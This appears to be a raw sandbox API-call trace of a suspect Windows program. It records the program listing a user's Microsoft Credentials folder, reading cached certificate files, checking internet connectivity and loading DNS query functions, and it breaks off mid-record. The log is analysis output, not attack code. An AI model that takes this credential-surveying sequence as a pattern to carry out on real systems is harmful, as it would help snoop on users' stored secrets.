FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Credentials\*.* |
SUCCESS | 0x0016ce68 | |
| 07:44:01,517 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xda\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\\x00\x00\x00\x00\x00\x00\x00\x10\x00S\x00-\x001\x00-\x005\x00-\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00-\x001\x00-\x005\x00-\x002\x001\x00-\x001\x009\x003\x005\x006\x005\x005\x006\x009\x007\x00-\x001\x006\x000\x006\x009\x008\x000\x008\x004\x00 |
SUCCESS | 0x00000000 | |
| 07:44:01,527 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,607 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Credentials\S-1-5-21-1935655697-1606980848-1060284298-1003\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:44:01,607 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:01,607 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:01,607 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:01,607 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,697 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\*.* |
SUCCESS | 0x0016ce68 | |
| 07:44:01,697 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xf3Q\xf3\xdf\x91\xcf\x01\x00\xf3Q\xf3\xdf\x91\xcf\x01\x90\x88V\xf3\xdf\x91\xcf\x01\x90\x88V\xf3\xdf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xdap\x00\x00\x00\x00\x00\x00\x00\x90\x88V\xf3\xdf\x91\xcf\x01\x80E\xf0i\xe3\x91\xcf\x01\x80E\xf0i\xe3\x91\xcf\x01\x80E\xf0i\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00o\x00n\x00t\x00e\x00n\x00t\x001\x00-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3Q\xf3\xdf\x91\xcf\x010\x93\xe5i\xe3\x91\xcf\x010\x93\xe5i\xe3\x91\xcf\x010\x93\xe5i\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:01,697 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:01,787 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:44:01,987 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x88V\xf3\xdf\x91\xcf\x01\x80E\xf0i\xe3\x91\xcf\x01P,\xcd\xb1\xe6\x91\xcf\x01P,\xcd\xb1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\xb0#\xb0\x1f\xe0\x91\xcf\x01\xb0#\xb0\x1f\xe0\x91\xcf\x01\xb0#\xb0\x1f\xe0\x91\xcf\x01\xb0#\xb0\x1f\xe0\x91\xcf\x017\xa0\x02\x00\x00\x00\x00\x00\x00\xb0\x02\x00\x00\x00\x00\x00$\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x10\x001\x002\x002\x003\x006\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x001\x002\x002\x003\x006\x00C\x004\x001\x00C\x00D\x00D\x00F\x009\x00E\x004\x000\x00B\x00A\x005\x006\x000\x006\x00C\x00D\x00F\x000\x008\x006\x00B\x00 |
SUCCESS | 0x00000000 | |
| 07:44:01,997 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\140B4CDED8ED877CDC65B54BA965BD39 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:01,997 | 504 | NtReadFile |
Buffer => 0\x82\x07\xc90\x82\x05\xb1\xa0\x03\x02\x01\x02\x02\x01\x010
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000}1\x0b0 \x06\x03U\x04\x06\x13\x02IL1\x160\x14\x06\x03U\x04
\x13
StartCom Ltd.1+0)\x06\x03U\x04\x0b\x13"Secure Digital Certificate Signing1)0'\x06\x03U\x04\x03\x13 StartCom Certification Authority0\x1e\x17
060917194636Z\x17
360917194636Z0}1\x0b0 \x06\x03U\x04\x06\x13\x02IL1\x160\x14\x06\x03U\x04
\x13
StartCom Ltd.1+0)\x06\x03U\x04\x0b\x13"Secure Digital C FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,007 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,007 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00010000 BaseAddress => 0x00175000 |
SUCCESS | 0x00000000 | |
| 07:44:02,017 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\303572DF538EDD8B1D606185F1D559B8 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,017 | 504 | NtReadFile |
Buffer => 0\x82\x01Q0\x81\xbb0
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000\x81\x8b1\x0b0 \x06\x03U\x04\x06\x13\x02ZA1\x150\x13\x06\x03U\x04\x08\x13\x0cWestern Cape1\x140\x12\x06\x03U\x04\x07\x13\x0bDurbanville1\x0f0
\x06\x03U\x04
\x13\x06Thawte1\x1d0\x1b\x06\x03U\x04\x0b\x13\x14Thawte Certification1\x1f0\x1d\x06\x03U\x04\x03\x13\x16Thawte Timestamping CA\x17
140617000000Z\x17
140930235959Z0
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x00\x03\x81\x81\x00\x92\x1c\xdepe\xfd\x08y\xae\x91\x95\x97
$\x99{_\xf5\xf0\xf0 \x80}["\xc4\xe7\xea\x11`4\x9b\x04>p}\x0c\x98\xbf\xf7\xf0\x98\x05 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,017 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,027 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\3130B1871A126520A8C47861EFE3ED4D DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,027 | 504 | NtReadFile |
Buffer => 0\x82\x02\x050\x81\xee\x02\x01\x010
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000y1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13
Washington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04
\x13\x15Microsoft Corporation1#0!\x06\x03U\x04\x03\x13\x1aMicrosoft Timestamping PCA\x17
140514201017Z\x17
440513202154Z\xa0A0?0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14o\xe8N?\x97\xb94\xabK\x86\x8f\xbc\x9c\xea\xac;AC\xc6\xd00\x10\x06 +\x06\x01\x04\x01\x827\x15\x01\x04\x03\x02\x01\x000
\x06\x03U\x1d\x14\x04\x03\x02\x01)0
\x06 *\x86H\x86\xf7
\x01 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,027 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,037 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\398EE64D66758B5715368AA94044B13A DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,047 | 504 | NtReadFile |
Buffer => 0\x82\x08\xe30\x82\x07\xcb\x02\x01\x010
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000\x81\x8c1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x1d0\x1b\x06\x03U\x04
\x13\x14Symantec Corporation1\x1f0\x1d\x06\x03U\x04\x0b\x13\x16Symantec Trust Network1=0;\x06\x03U\x04\x03\x134Symantec Class 3 Extended Validation Code Signing CA\x17
140626210100Z\x17
140703210100Z0\x82\x06\xd60!\x02\x10\x06\xc1\xc2\xae>\x18
\xdd\xa2{\xbf+\xd8\xea\xc0\xe7\x17
131029083537Z0!\x02\x10\x08z\x1f\x06Q\xa6\x94{O\x96\x13k1? FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,057 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,057 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\5C45AD19E3530EC4218F560AFC04C3F7 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,057 | 504 | NtReadFile |
Buffer => 0\x82\x02\x110\x81\xfa0
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000\x81\xca1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04
\x13\x0eVeriSign, Inc.1\x1f0\x1d\x06\x03U\x04\x0b\x13\x16VeriSign Trust Network1:08\x06\x03U\x04\x0b\x131(c) 2006 VeriSign, Inc. - For authorized use only1E0C\x06\x03U\x04\x03\x13<VeriSign Class 3 Public Primary Certification Authority - G5\x17
140617000000Z\x17
140930235959 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,057 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,057 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,067 | 504 | NtReadFile |
Buffer => 0\x82\x03\xa10\x82\x03
0
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000_1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04
\x13\x0eVeriSign, Inc.1705\x06\x03U\x04\x0b\x13.Class 3 Public Primary Certification Authority\x17
140617000000Z\x17
140930235959Z0\x82\x02x0!\x02\x10\x01v\x1e\x18\xe2\xbca_>\xde\xdd2\xa5\xb9\xfd\x0e\x17
020924164823Z0!\x02\x10\x07\x82\xa5A\x14\xe5\xbd\xf2\xb3{2\x92\xbcY\xc8#\x17
140129175709Z0!\x02\x10\x11,\x14|\xe9|\xf5\xef\x8c<\xb4\xe9\xe4j \x99\x17
0806051749 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,067 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,077 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\696F3DE637E6DE85B458996D49D759AD DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,077 | 504 | NtReadFile |
Buffer => 0\x82\x03)0\x82\x01\x11\x02\x01\x010
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000_1\x130\x11\x06
\x92&\x89\x93\xf2,d\x01\x19\x16\x03com1\x190\x17\x06
\x92&\x89\x93\xf2,d\x01\x19\x16 microsoft1-0+\x06\x03U\x04\x03\x13$Microsoft Root Certificate Authority\x17
140523204817Z\x17
140822090816Z0\x1d0\x1b\x02
a\x02\xb0\x19\x00\x00\x00\x00\x00/\x17
100208014912Z\xa0_0]0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14\x0e\xac\x82`@V'\x97\xe5%\x13\xfc*\xe1
S\x95Y\xe4\xa40\x10\x06 +\x06\x01\x04\x01\x827\x15\x01\x04\x03\x02\x01\x000
\x06\x03U\x1d\x14\x04\x03\x02\x01%0\x1c\x06 + FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,077 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,087 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\7396C420A8E1BC1DA97F1AF0D10BAD21 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,087 | 504 | NtReadFile |
Buffer => 0\x82\x02&0\x82\x01\x0e\x02\x01\x010
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000y1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13
Washington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04
\x13\x15Microsoft Corporation1#0!\x06\x03U\x04\x03\x13\x1aMicrosoft Code Signing PCA\x17
140428200830Z\x17
140729082830Z\xa0a0_0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14\xcb\x11\xe8\xca\xd2\xb4\x16X\x01\xc97.3\x16\x16\xb9L\x9a
\x1f0\x12\x06 +\x06\x01\x04\x01\x827\x15\x01\x04\x05\x02\x03\x01\x00\x010
\x06\x03U\x1d\x14\x04\x03\x02\x01H0\x1c\x06 +\x06\x01\x04 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,087 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,087 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\74BFD122C0875EC75DBE5C6DB4C59019 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,097 | 504 | NtReadFile |
Buffer => 0\x82F\xe80\x82FQ0
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000\x81\xce1\x0b0 \x06\x03U\x04\x06\x13\x02ZA1\x150\x13\x06\x03U\x04\x08\x13\x0cWestern Cape1\x120\x10\x06\x03U\x04\x07\x13 Cape Town1\x1d0\x1b\x06\x03U\x04
\x13\x14Thawte Consulting cc1(0&\x06\x03U\x04\x0b\x13\x1fCertification Services Division1!0\x1f\x06\x03U\x04\x03\x13\x18Thawte Premium Server CA1(0&\x06 *\x86H\x86\xf7
\x01 \x01\x16\x19premium-server@thawte.com\x17
140626210055Z\x17
1407062 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,148 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,148 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\79841F8EF00FBA86D33CC5A47696F165 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,148 | 504 | NtReadFile |
Buffer => 0\x82\x01\x990\x81\x820
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000S1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04
\x13\x0eVeriSign, Inc.1+0)\x06\x03U\x04\x03\x13"VeriSign Time Stamping Services CA\x17
140617000000Z\x17
140930235959Z0
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x00\x03\x82\x01\x01\x000\xe8\xe9\x10\xf9\xd0\xc5c\xacy\x020\x9c\xc4\xa3u\\x9d\xbbi\x0c\x0c\xe8,\xda\xf6\x19\xfc@\xc2\xd5\xe5L]?aJ\xf3MC\x9ajx\xc2\x93V\xbd\xb4\xe4m\xa9Gl#
\x81\xb03\xee-\xa1\xe8\xca\x85)\xf9h\x86\xea\xb0N\x07\x1d\x08p~\xde\xbe,\x8c\x9aK\x17\xdb\x1fuW\xafQL!\xb0\xe4r)\xc9bs* FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,148 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,158 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\7B2238AACCEDC3F1FFE8E7EB5F575EC9 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,158 | 504 | NtReadFile |
Buffer => 0\x82\x01\xf60\x81\xdf\x02\x01\x010
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000y1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13
Washington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04
\x13\x15Microsoft Corporation1#0!\x06\x03U\x04\x03\x13\x1aMicrosoft Code Signing PCA\x17
120723210658Z\xa0A0?0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14\xcc\x1d\xcev\x00p[\xaf\xf1\xda\xc4N\x9aQD.\xa3Dc\xf00\x10\x06 +\x06\x01\x04\x01\x827\x15\x01\x04\x03\x02\x01\x000
\x06\x03U\x1d\x14\x04\x03\x02\x0140
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x00\x03\x82\x01\x01\x00\xa4\xa2]4}\xfd FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,158 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,158 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,158 | 504 | NtReadFile |
Buffer => 0\x82\x02\x110\x81\xfa0
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000\x81\xca1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04
\x13\x0eVeriSign, Inc.1\x1f0\x1d\x06\x03U\x04\x0b\x13\x16VeriSign Trust Network1:08\x06\x03U\x04\x0b\x131(c) 2006 VeriSign, Inc. - For authorized use only1E0C\x06\x03U\x04\x03\x13<VeriSign Class 3 Public Primary Certification Authority - G5\x17
140617000000Z\x17
140930235959 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,168 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,168 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\A1377F7115F1F126A15360369B165211 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,178 | 504 | NtReadFile |
Buffer => 0\x82\x02Q0\x82\x019\x02\x01\x010
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000y1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13
Washington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04
\x13\x15Microsoft Corporation1#0!\x06\x03U\x04\x03\x13\x1aMicrosoft Code Signing PCA\x17
140428200830Z\x17
140729082830Z0+0)\x02
a\x0e\\xbb\x00\x00\x00\x00\x005\x17
091029235355Z0\x0c0
\x06\x03U\x1d\x15\x04\x03
\x01\x04\xa0_0]0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14WEt\x1c]\xb0\xf6\xc8C\x05\xe0\x8cT-\x8f FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,178 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,188 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\A44F4E7CB3133FF765C39A53AD8FCFDD DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,188 | 504 | NtReadFile |
Buffer => 0\x82\x02*0\x82\x01\x12\x02\x01\x010
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000\x81\xa61\x0b0 \x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13
Washington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04
\x13\x15Microsoft Corporation1+0)\x06\x03U\x04\x0b\x13"Copyright (c) 2000 Microsoft Corp.1#0!\x06\x03U\x04\x03\x13\x1aMicrosoft Code Signing PCA\x17
111110211944Z\x17
420416234935Z\xa07050\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14%\xf8+K]\xc8rT\xad\xe5\xf6\xa0*\x17 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,188 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,188 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\Content\F90F18257CBB4D84216AC1E1F3BB2C76 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,188 | 504 | NtReadFile |
Buffer => 0\x82\x02"0\x82\x01
\x02\x01\x010
\x06 *\x86H\x86\xf7
\x01\x01\x05\x05\x000w1\x0b0 \x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13
Washington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04
\x13\x15Microsoft Corporation1!0\x1f\x06\x03U\x04\x03\x13\x18Microsoft Time-Stamp PCA\x17
140504211538Z\x17
140803093538Z\xa0_0]0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14#4\xf8\xd9RFp
\xed@\xfbv\xfb\xb3+\xb0\xc35\xb3\x0f0\x10\x06 +\x06\x01\x04\x01\x827\x15\x01\x04\x03\x02\x01\x000
\x06\x03U\x1d\x14\x04\x03\x02\x01.0\x1c\x06 +\x06\x01\x04\x01\x827\x15 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:44:02,188 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:44:02,188 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:02,188 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:02,208 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:02,208 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:02,208 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:02,208 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:02,208 | 1308 | CreateThread |
ThreadId => 364 StartRoutine => 0x00504a37 Parameter => 0x0016cea0 CreationFlags => 0 |
SUCCESS | 0x00000194 | |
| 07:44:02,208 | 1308 | NtDelayExecution |
Milliseconds => 85 |
SUCCESS | 0x00000000 | |
| 07:44:02,208 | 364 | LdrGetDllHandle |
ModuleHandle => 0x00000000 FileName => dnsapi.dll |
FAILURE | 3221225781 | 1 time |
| 07:44:02,208 | 364 | LdrLoadDll |
Flags => 14679700 BaseAddress => 0x76f20000 FileName => dnsapi.dll |
SUCCESS | 0x00000000 | |
| 07:44:02,208 | 364 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DnsQuery_A FunctionAddress => 0x76f3684b ModuleHandle => 0x76f20000 |
SUCCESS | 0x00000000 | |
| 07:44:02,268 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:44:02,278 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xf3Q\xf3\xdf\x91\xcf\x010\x93\xe5i\xe3\x91\xcf\x01P,\xcd\xb1\xe6\x91\xcf\x01P,\xcd\xb1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x80\x9c\xae\x1f\xe0\x91\xcf\x01\xb0#\xb0\x1f\xe0\x91\xcf\x01\xb0#\xb0\x1f\xe0\x91\xcf\x01\xb0#\xb0\x1f\xe0\x91\xcf\x01r\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00$\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x10\x001\x002\x002\x003\x006\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x001\x002\x002\x003\x006\x00C\x004\x001\x00C\x00D\x00D\x00F\x009\x00E\x0